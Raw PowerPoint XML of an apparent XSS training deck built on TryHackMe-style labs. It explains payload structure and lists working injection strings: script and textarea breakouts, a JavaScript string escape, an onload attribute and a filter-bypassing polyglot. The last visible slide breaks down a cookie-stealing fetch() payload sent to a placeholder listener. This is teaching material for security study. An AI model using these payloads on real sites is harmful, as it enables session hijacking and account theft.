              <a:t>Html attributes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.w3schools.com/html/html_attributes.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Html Event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.w3schools.com/tags/ref_eventattributes.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>     (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Perfecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0"/>
              <a:t>your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>payload(Lab)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9590068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GB" b="1" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>lert()----attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The alert() method displays an alert box with a message and an OK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>alert() method is used when you want information to come through to the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>cript----tag&lt;&gt;&lt;/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Input---tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>….Don’t&lt;/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> &lt;input type="text" id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>"&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8876669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GB" dirty="0" smtClean="0"/>
              <a:t>Lab-01:</a:t>
            </a:r>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Lab-02:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>"&gt;&lt;script&gt;alert('THM');&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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646" y="403532"/>
            <a:ext cx="4298172" cy="10704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7419" y="425426"/>
            <a:ext cx="6408632" cy="102123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797" y="3382867"/>
            <a:ext cx="5259762" cy="929826"/>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03664" y="3223216"/>
            <a:ext cx="8009343" cy="925703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20628321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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, better known as XSS in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" u="sng" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>What is a payload?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>In XSS, the payload is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>we wish to be executed on the targets computer. There are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> to the payload, </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
              <a:t>intention </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
              <a:t>modification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>The intention is what you wish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the JavaScript to actually do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>the modification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is the changes to the code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>we need to make it execute as every scenario is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>different.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28825720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GB" dirty="0" smtClean="0"/>
              <a:t>Lab-03:  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;&lt;script&gt;alert('THM');&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Lab-04:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>You'll have to escape the existing JavaScript command, so you're able to run your code; you can do this with the following payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>';alert('THM');//  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>which you'll see from the below screenshot will execute your code. The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>closes the field specifying the name, then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>signifies the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>end of the current command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>at the end makes anything after it a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> rather than executable code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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0137" y="615925"/>
            <a:ext cx="3017171" cy="237293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3048" y="1138592"/>
            <a:ext cx="7482138" cy="81303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8406" y="3282570"/>
            <a:ext cx="7221152" cy="879997"/>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89807" y="3945908"/>
            <a:ext cx="6810165" cy="762569"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21065433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GB" dirty="0" smtClean="0"/>
              <a:t>Lab:05:</a:t>
            </a:r>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Lab-06:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>images/cat.jpg" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>="alert('THM');</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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80017"/>
            <a:ext cx="4856582" cy="92570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0214" y="186652"/>
            <a:ext cx="4745445" cy="278856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3487572"/>
            <a:ext cx="5190905" cy="1098076"/>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53476" y="3630091"/>
            <a:ext cx="6310561" cy="1078387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26600530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GB" b="1" dirty="0"/>
              <a:t>Polyglots:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one. You could have used the below polyglot on all six levels you've just completed, and it would have executed the code successfully.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>jaVasCript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>:/*-/*`/*\`/*'/*"/**/(/* */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>=alert('THM') )//%0D%0A%0d%0a//&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>stYle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>/&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>titLe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>/&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>teXtarEa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>/&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>scRipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>/--!&gt;\x3csVg/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>sVg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>oNloAd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>=alert('THM')//&gt;\x3e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25161339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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some helpful information to extract from another user would be their cookies, which we could use to elevate our privileges by hijacking their login session. To do this, our payload will need to extract the user's cookie and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> it to another webserver server of our choice. Firstly, we'll need to set up a listening server to receive the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Let's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>breakdown the payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>tag closes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t> field. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>opens open an area for us to write JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>fetch() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>command makes an HTTP request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>{URL_OR_IP} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>is either the THM request catcher URL or your IP address from the THM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>AttackBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t> or your IP address on the THM VPN Network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>the query string that will contain the victim's cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>command base64 encodes the victim's cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
